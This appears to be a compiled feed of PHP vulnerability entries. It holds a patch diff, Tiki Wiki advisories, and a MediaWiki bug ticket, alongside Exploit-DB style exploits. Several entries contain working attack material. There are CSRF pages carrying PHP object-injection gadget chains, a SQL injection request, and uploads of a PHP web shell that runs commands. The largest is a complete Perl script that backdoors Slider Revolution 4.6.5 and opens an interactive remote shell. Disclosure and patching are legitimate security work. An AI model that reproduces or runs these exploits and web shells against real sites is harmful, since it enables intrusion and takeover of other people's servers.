A vulnerability has been found in fabarea media_upload and classified as critical. This vulnerability affects the function getUploadedFileList of the file Classes/Service/UploadFileService.php. The manipulation leads to pathname traversal. Upgrading to version 0.9.0 is able to address this issue. The name of the patch is b25d42a4981072321c1a363311d8ea2a4ac8763a. It is recommended to upgrade the affected component. VDB-217786 is the identifier assigned to this vulnerability.

@@ -34,33 +34,35 @@ public function getUploadedFileList($property = '')

\* Return an array of uploaded files, done in a previous step.

\*

\* @param string $property

\* @throws \\Exception

\* @return UploadedFile\[\]

\* @throws \\InvalidArgumentException

\* @throws \\RuntimeException

\*/

public function getUploadedFiles($property = '')

{

  

$files = array();

$uploadedFiles = GeneralUtility::trimExplode(',', $this\->getUploadedFileList($property), TRUE);

  

// Convert uploaded files into array

foreach ($uploadedFiles as $uploadedFileName) {

  

$temporaryFileNameAndPath = UploadManager::UPLOAD\_FOLDER . '/' . $uploadedFileName;

// Protection against directory traversal

$uploadedFileName = str\_replace('..' . DIRECTORY\_SEPARATOR, '', $uploadedFileName);

$temporaryFileNameAndPath = UploadManager::UPLOAD\_FOLDER . DIRECTORY\_SEPARATOR . $uploadedFileName;

  

if (!file\_exists($temporaryFileNameAndPath)) {

$message = sprintf(

'I could not find file "%s". Something went wrong during the upload? Or is it some cache effect?',

$temporaryFileNameAndPath

);

throw new \\Exception($message, 1389550006);

throw new \\RuntimeException($message, 1389550006);

}

$fileSize = round(filesize($temporaryFileNameAndPath) / 1000);

  

/\*\* @var UploadedFile $uploadedFile \*/

$uploadedFile = GeneralUtility::makeInstance(UploadedFile::class);

$uploadedFile\->setTemporaryFileNameAndPath($temporaryFileNameAndPath)

\->setFileName($uploadedFileName)

\->setFileName(basename($uploadedFileName))

\->setSize($fileSize);

  

$files\[\] = $uploadedFile;

CVE-2016-15017: [SECURITY] Prevent directory traversal · fabarea/media_upload@b25d42a

Tiki Wiki CMS Groupware versions 24.1 and below suffer from a PHP object injection vulnerability in tikiimporter_blog_wordpress.php.

**Tiki Wiki CMS Groupware 24.1 tikiimporter\_blog\_wordpress.php PHP Object Injection**

    ----------------------------------------------------------------------------------------------------Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP Object Injection Vulnerability----------------------------------------------------------------------------------------------------[-] Software Link:https://tiki.org[-] Affected Versions:Version 24.1 and prior versions.[-] Vulnerability Description:The vulnerability is located in the /lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when importing data from WordPress sites through the Tiki Importer, user input passed through the uploaded XML file is being used in a call to the unserialize() PHP function. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires an admin account (specifically, the ‘tiki_p_admin_importer’ permission). However, due to the CSRF vulnerability described in KIS-2023-01, this vulnerability might also be exploited by tricking a victim user into opening a web page like the following:<html>  <form action="http://localhost/tiki/tiki-importer.php" method="POST" enctype="multipart/form-data">   <input type="hidden" name="importerClassName" value="TikiImporter_Blog_Wordpress" />   <input type="hidden" name="importAttachments" value="on" />   <input type="file" name="importFile" id="fileinput"/>  </form>  <script>   const xmlContent = atob("PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8cnNzIHZlcnNpb249IjIuMCIgeG1sbnM6d3A9Imh0dHA6Ly93b3JkcHJlc3Mub3JnL2V4cG9ydC8xLjIvIj4KIDxjaGFubmVsPgogIDxpdGVtPgogICA8d3A6cG9zdF90eXBlPmF0dGFjaG1lbnQ8L3dwOnBvc3RfdHlwZT4KICAgPHdwOnBvc3RtZXRhPgogICAgPHdwOm1ldGFfa2V5Pl93cF9hdHRhY2htZW50X21ldGFkYXRhPC93cDptZXRhX2tleT4KICAgIDx3cDptZXRhX3ZhbHVlPjwhW0NEQVRBW086MjU6IlNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb24iOjE6e1M6MzE6IlwwMFNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb25cMDBidWxrIjtPOjI4OiJTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uIjozOntTOjM1OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY291bnQiO2k6MTtTOjM4OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY2FsbGJhY2siO1M6MTQ6ImNhbGxfdXNlcl9mdW5jIjtTOjM2OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwYnVmZmVyIjthOjI6e2k6MDtPOjIyOiJUcmFja2VyX0ZpZWxkX0NvbXB1dGVkIjozOntTOjMyOiJcMDBUcmFja2VyX0ZpZWxkX0Fic3RyYWN0XDAwaXRlbURhdGEiO2E6MTp7Uzo2OiJpdGVtSWQiO2k6MTt9UzozMToiXDAwVHJhY2tlcl9GaWVsZF9BYnN0cmFjdFwwMG9wdGlvbnMiO086MTU6IlRyYWNrZXJfT3B0aW9ucyI6MTp7UzoyMToiXDAwVHJhY2tlcl9PcHRpb25zXDAwZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg==");   const fileInput = document.getElementById("fileinput");   const dataTransfer = new DataTransfer();   const file = new File([xmlContent], "test.xml", {type: "text/xml"});   dataTransfer.items.add(file);   fileInput.files = dataTransfer.files;   document.forms[0].submit();  </script></html>[-] Solution:Upgrade to version 24.2 or later.[-] Disclosure Timeline:[07/03/2022] - Vendor notified[23/08/2022] - Version 24.1 released[09/01/2023] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-22851 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2023-04

Tiki Wiki CMS Groupware 24.1 tikiimporter_blog_wordpress.php PHP Object Injection

Tiki Wiki CMS Groupware versions 24.0 and below suffers from a PHP object injection vulnerability in grid.php.

    -----------------------------------------------------------------------------Tiki Wiki CMS Groupware <= 24.0 (grid.php) PHP Object Injection Vulnerability-----------------------------------------------------------------------------[-] Software Link:https://tiki.org[-] Affected Versions:Version 24.0 and prior versions.[-] Vulnerability Description:The vulnerability is located in the /lib/sheet/grid.php script, specifically into the TikiSheetSerializeHandler::_load() method, which is using the unserialize() PHP function with user-controlled input. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires the “Spreadsheets” feature to be enabled and an account with permissions to create a new sheet. However, due to the CSRF vulnerability described in KIS-2023-01, this vulnerability might also be exploited by tricking a victim user into opening a web page like the following:<html>  <form action="http://localhost/tiki/tiki-import_sheet.php?sheetId=1" method="POST" enctype="multipart/form-data">   <input type="hidden" name="handler" value="TikiSheetSerializeHandler" />   <input type="file" name="file" id="fileinput"/>  </form>  <script>   const popChain = 'O:25:"Search_Elastic_Connection":1:{S:31:"\00Search_Elastic_Connection\00bulk";O:28:"Search_Elastic_BulkOperation":3:{S:35:"\00Search_Elastic_BulkOperation\00count";i:1;S:38:"\00Search_Elastic_BulkOperation\00callback";S:14:"call_user_func";S:36:"\00Search_Elastic_BulkOperation\00buffer";a:2:{i:0;O:22:"Tracker_Field_Computed":3:{S:32:"\00Tracker_Field_Abstract\00itemData";a:1:{S:6:"itemId";i:1;}S:31:"\00Tracker_Field_Abstract\00options";O:15:"Tracker_Options":1:{S:21:"\00Tracker_Options\00data";a:1:{S:7:"formula";S:14:"null;phpinfo()";}}S:41:"\00Tracker_Field_Abstract\00trackerDefinition";O:18:"Tracker_Definition":0:{}}i:1;S:12:"getFieldData";}}}';   const fileInput = document.getElementById("fileinput");   const dataTransfer = new DataTransfer();   const file = new File([popChain], "test");   dataTransfer.items.add(file);   fileInput.files = dataTransfer.files;   document.forms[0].submit();  </script></html>[-] Solution:Upgrade to version 24.1 or later.[-] Disclosure Timeline:[07/03/2022] - Vendor notified[23/08/2022] - Version 24.1 released[09/01/2023] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-22850 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2023-03

Tiki Wiki CMS Groupware 24.0 grid.php PHP Object Injection

72crm v9 was discovered to contain an arbitrary file upload vulnerability via the avatar upload function. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

****Brief of this vulnerability****

72crm v9 has Arbitrary file upload vulnerability Where to upload the avatar

****Test Environment****

*   Windows10
*   PHP 5.6.9+Apache/2.4.39

****Affect version****

72crm v9

****Vulnerable Code****

application\\admin\\controller\\Users.php line 259  
  
After follow-up, it was found that the validate was not set, and the move operation was performed directly, resulting in the ability to upload any file  
  
follow-up move function（set filename）  
line 352:  
  
follow up function  
Generate time-based file names with php as a suffix  
  
then move\_uploaded\_file with this filename （thinkphp\\library\\think\\File.php line 369）  

****Vulnerability display****

First enter the background  
Click as shown,go to the Enterprise management background  
  
Click to change avatar  
  
Capture the packet and modify the content as follows  
  
Although it is judged as an illegal file, the file has been uploaded successfully, and the file path will be exposed when the debug mode is turned on  
  
  
getshell  
  
note：  
Even if debug is not turned on, the file name can be blasted out through the file name naming rules

CVE-2022-46610: 72crm v9 has Arbitrary file upload vulnerability in the avatar upload · Issue #36 · 72wukong/72crm-9.0-PHP

Tiki Wiki CMS Groupware versions 24.0 and below suffer from a PHP code injection vulnerability in structlib.php.

    --------------------------------------------------------------------------------Tiki Wiki CMS Groupware <= 24.0 (structlib.php) PHP Code Injection Vulnerability--------------------------------------------------------------------------------[-] Software Link:https://tiki.org[-] Affected Versions:Version 24.0 and prior versions.[-] Vulnerability Description:The vulnerability is located in the /lib/structures/structlib.php script, specifically in the StructLib::structure_to_webhelp() method, which is using an eval() call with user-controlled input. This can be exploited by malicious users to inject and execute arbitrary PHP code. Successful exploitation of this vulnerability requires the “feature_create_webhelp” to be enabled and an account with permissions to create a wiki page.[-] Solution:Upgrade to version 24.1 or later.[-] Disclosure Timeline:[08/03/2022] - Vendor notified[23/08/2022] - Version 24.1 released[09/01/2023] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-22853 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2023-02

Tiki Wiki CMS Groupware 24.0 structlib.php Code Execution

Tiki Wiki CMS Groupware versions 25.0 and below suffer from multiple cross site request forgery vulnerabilities.

------------------------------------------------------------------------------  
Tiki Wiki CMS Groupware <= 25.0 Two Cross-Site Request Forgery   
Vulnerabilities  
------------------------------------------------------------------------------

[-] Software Link:

https://tiki.org

[-] Affected Versions:

Version 25.0 and prior versions.

[-] Vulnerabilities Description:

1) The /tiki-importer.php script does not implement any protection   
against Cross-Site Request Forgery (CSRF) attacks. As such, an attacker   
might force an authenticated user to import arbitrary content (wiki   
pages) into TikiWiki by tricking a victim user into browsing to a   
specially crafted web page.

2) The /tiki-import_sheet.php script does not implement any protection   
against Cross-Site Request Forgery (CSRF) attacks. As such, an attacker   
might force an authenticated user to import arbitrary sheets into   
TikiWiki by tricking a victim user into browsing to a specially crafted   
web page. Successful exploitation of this vulnerability requires the   
“Spreadsheets” feature to be enabled.

[-] Solution:

No official solution is currently available.

[-] Disclosure Timeline:

[06/03/2022] - Vendor notified  
[09/01/2023] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2023-22852 to this vulnerability.

[-] Credits:

Vulnerabilities discovered by Egidio Romano.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2023-01

Tiki Wiki CMS Groupware 25.0 Cross Site Request Forgery

Online Food Ordering System version 2.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Food Ordering System v2 - Sql Injection (Time-Based Blind)# Date: 01/10/2023# Exploit Author: Anıl Kızıltan# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code# Version: 2.0 # Tested on: Macos / XAMPP# username parameter is vulnerable to sql injection. You can exploit this sqlmap command: (First save this raw request as req.txt)# sqlmap -r req.txt -p username --dump-all####### Raw Request #######POST /fos/admin/ajax.php?action=login HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 32Origin: http://localhostConnection: closeReferer: http://localhost/fos/admin/login.phpCookie: language=en; welcomebanner_status=dismiss; continueCode=LoPJXWEAqruytmUYHrT4FDiBZikOH1Vh8Zh7JHvLtppI9VCvXHEYd7ywQ1B5; cookieconsent_status=dismiss; PHPSESSID=eje1menuonpvjtfbl2ri965btkSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originusername='-sleep(1)-'&password=a

Online Food Ordering System 2.0 SQL Injection

Online Food Ordering System version 2.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Online Food Ordering System v2 - Remote Code Execution (RCE) (Unauthenticated)  
# Date: 01/10/2023  
# Exploit Author: Hakan Sonay  
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code  
# Version: 2.0   
# Tested on: Windows 10 / XAMPP

############## Unauthenticated File Upload Request ##############

POST /fos/admin/ajax.php?action=save_settings HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0  
Accept: */*  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------19276025152284567381240485635  
Content-Length: 831  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/fos/admin/index.php?page=site_settings  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="name"

Online Food Ordering System V2  
-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="email"

info@sample.com  
-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="contact"

+6948 8542 623  
-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="about"

<p>shell command:</p><p>/assets/img/<file_name>.php?cmd=whoami</p>  
-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="img"; filename="rev_shell.php"  
Content-Type: text/php

<?php   
echo system($_GET['cmd']);  
?>

-----------------------------19276025152284567381240485635--

############## Command Execution Request ##############

http://localhost/fos/assets/img/****rev_shell.php?cmd=[Payload]

Online Food Ordering System 2.0 Shell Upload

WordPress Slider Revolution plugin version 4.6.5 suffers from a remote shell upload vulnerability.

====================================================================================================================================  
| # Title     : WordPress - Slider Revolution 4.6.5 WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit                 |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               |   
| # Vendor    : https://www.sliderrevolution.com/                                                                                  |    
| # Dork      : index off revslider\backup                                                                                         |  
====================================================================================================================================

[+] poc :

[+] Web shell upload :

    The following perl exploit will attempt to load the HTTP php shell through the update_plugin function  
    To use the exploit, be sure to compress the backdoor file  
    Because the exploit uploads a compressed file to the target

  [+] simple backdoor  :

     <?php  
     $cmd = $_GET['cmd'];  
     system($cmd);  
     ?> 

[+] Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension (indoushka.zip)

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine 

[+] Perl exploit :

 #!/usr/bin/perl  
#  
# Title     :WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit   
# Author    :indoushka  
# Vendor    :https://www.sliderrevolution.com/

use LWP::UserAgent;  
use MIME::Base64;  
use strict;

sub banner {  
system(($^O eq 'MSWin32') ? 'cls' : 'clear');  
print "   ============[+] Author : indoushka[+]===================\n";  
print "[+] Slider Revolution 4.6.5 shell upload 0-day exploit     [+]\n";  
print "   ========================================================   \n";  
print "[+] Uploading an web shell:                                [+]\n";  
print "[+] The following perl exploit will attempt to load the    [+]\n";   
print "[+] HTTP php backdoor through the update_plugin function   [+]\n";  
print "[+] To use the exploit, make sure you compress the backdoor[+]\n";   
print "============================================================== \n";  
system('color a');  
}

if (!defined ($ARGV[0] && $ARGV[1])) {  
banner();  
print "perl $0 <target> <plugin>\n";  
print "perl $0 http://localhost revslider\n";  
exit;  
}

my $zip1 = "indoushka.zip";

unless (-e ($zip1))  
{   
banner();  
print "[-] $zip1 not found! RTFM\n";  
exit;  
}

my $host = $ARGV[0];  
my $plugin = $ARGV[1];  
my $action;  
my $update_file;

if ($plugin eq "revslider") {  
$action = "revslider_ajax_action";  
$update_file = "$zip1";  
}  
elsif ($plugin eq "showbiz") {  
$action = "showbiz_ajax_action";

}  
else {  
banner();  
print "[-] Wrong plugin name\n";  
print "perl $0 <target> <plugin>\n";  
print "perl $0 http://localhost revslider\n";  
exit;  
}  
my $target = "wp-admin/admin-ajax.php";  
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php"; 

sub randomagent {  
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',  
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',  
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',  
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',  
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',  
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'  
);  
my $random = $array[rand @array];  
return($random);  
}  
my $useragent = randomagent();

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });  
$ua->timeout(10);  
$ua->agent($useragent);  
my $status = $ua->get("$host/$target");  
unless ($status->is_success) {  
banner();  
print "[-] Xploit failed: " . $status->status_line . "\n";  
exit;  
}

banner();  
print "[*] Target set to $plugin\n";  
print "[*] MorXploiting $host\n";

my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);

print "[*] Sent payload\n";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) {  
print "[+] Payload successfully executed\n";  
}

elsif ($exploit->decoded_content =~ /Wrong request/) {  
print "[-] Payload failed: Not vulnerable\n";  
exit;  
}

elsif ($exploit->decoded_content =~ m/0$/) {  
print "[-] Payload failed: Plugin unavailable\n";  
exit;  
}

else {  
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;  
print "[-] Payload failed:$1\n";  
print "[-] " . $exploit->decoded_content unless (defined $1);  
print "\n";  
exit;  
}

print "[*] Checking if shell was uploaded\n";

sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }  
my $rndstr = rndstr(8, 1..9, 'a'..'z');  
my $cmd1 = encode_base64("echo $rndstr");  
my $status = $ua->get("$host/$shell?cmd=$cmd1");

if ($status->decoded_content =~ /system has been disabled/) {  
print "[-] Xploit failed: system() has been disabled\n";  
exit;  
}

elsif ($status->decoded_content !~ /$rndstr/) {  
print "[-] Xploit failed: " . $status->status_line . "\n";  
exit;  
}

elsif ($status->decoded_content =~ /$rndstr/) {  
print "[+] Shell successfully uploaded\n";  
}  
my $cmd2 = encode_base64("whoami");  
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");  
my $cmd3 = encode_base64("uname -n");  
my $uname = $ua->get("$host/$shell?cmd=$cmd3");  
my $cmd4 = encode_base64("id");  
my $id = $ua->get("$host/$shell?cmd=$cmd4");  
my $cmd5 = encode_base64("uname -a");  
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");  
print $unamea->decoded_content;   
print $id->decoded_content;  
my $wa = $whoami->decoded_content;  
my $un = $uname->decoded_content;  
chomp($wa);  
chomp($un);

while () {  
print "\n$wa\@$un:~\$ ";  
chomp(my $cmd=<STDIN>);  
if ($cmd eq "exit")   
{   
print "Aurevoir!\n";  
exit;  
}  
my $ucmd = encode_base64("$cmd");  
my $output = $ua->get("$host/$shell?cmd=$ucmd");  
print $output->decoded_content;  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |  
                                                                                                                                      |  
=======================================================================================================================================

WordPress Slider Revolution 4.6.5 Shell Upload

An issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. SpecialMobileHistory allows remote attackers to cause a denial of service because database queries are slow.

**

\[Unplanned, S\] Mobile frontend's history makes really slow db queries

Closed, ResolvedPublic1 Estimated Story PointsSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

Risk Rating

Medium

Author Affiliation

WMF Technology Dept

*   Task Graph
*   Mentions

**Event Timeline**

Ladsgroup added a parent task: Restricted Task.

Jdlrobson renamed this task from Mobile frontend's history makes really slow db queries to (Unplanned, S) Mobile frontend's history makes really slow db queries.Nov 7 2022, 6:45 PM

Jdlrobson renamed this task from (Unplanned, S) Mobile frontend's history makes really slow db queries to \[Unplanned, S\] Mobile frontend's history makes really slow db queries.Nov 7 2022, 6:45 PM

Comment Actions

@Mabualruz will take a look.  
Long term we'd like to get rid of this class/page (T305113), but the change requested here seems very modest so we'd be happy to take a look.  
@Ladsgroup presumably review should happen on this ticket and we shouldn't post anything to Gerrit?

sbassett changed Author Affiliation from N/A to WMF Technology Dept.

sbassett changed Risk Rating from N/A to Medium.

Comment Actions

> @Mabualruz will take a look.  
> Long term we'd like to get rid of this class/page (T305113), but the change requested here seems very modest so we'd be happy to take a look.  
> @Ladsgroup presumably review should happen on this ticket and we shouldn't post anything to Gerrit?

Indeed. It feels like re-inventing the wheel. I don't mind pushing for the removal of the mobile special page. I don't think it'd be much work.

Comment Actions

LGTM in general not a big change, maybe just need to update the constructor's PHPdocs.

Comment Actions

> LGTM in general not a big change, maybe just need to update the constructor's PHPdocs.

I removed the phpdocs because it wasn't giving any extra information and already handled by typehints

Comment Actions

Deployed now. For what it's worth, it had a small issue that I fixed in this:  

sbassett changed the task status from Open to In Progress.EditedNov 15 2022, 4:45 PM

sbassett lowered the priority of this task from Medium to Low.

Comment Actions

Thanks, @Ladsgroup. Since ext:MobileFrontend isn't bundled, I'll track this one for the next supplemental security release at T318974. And within the list of currently-deployed security patches at T276237.

Comment Actions

I believe the security team will handle applying this to master and resolving this ticket. Please feel free to reach out if that's not correct and/or if you need anything from web team by tagging Readers-Web-Backlog .

Comment Actions

> I believe the security team will handle applying this to master and resolving this ticket. Please feel free to reach out if that's not correct and/or if you need anything from web team by tagging Readers-Web-Backlog .

We can, sure. But that likely wouldn't happen until closer to the end of the quarter, when we prep the upcoming supplemental security release (T318974). Since this is patched in wikimedia production, and ext:MF isn't bundled, we can definitely make this task public and folks can start working on any relevant backports if they'd like. But as stated, the Security-Team typically doesn't do that right away, but closer to the actual end-of-quarter supplemental release.

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

Tag

#php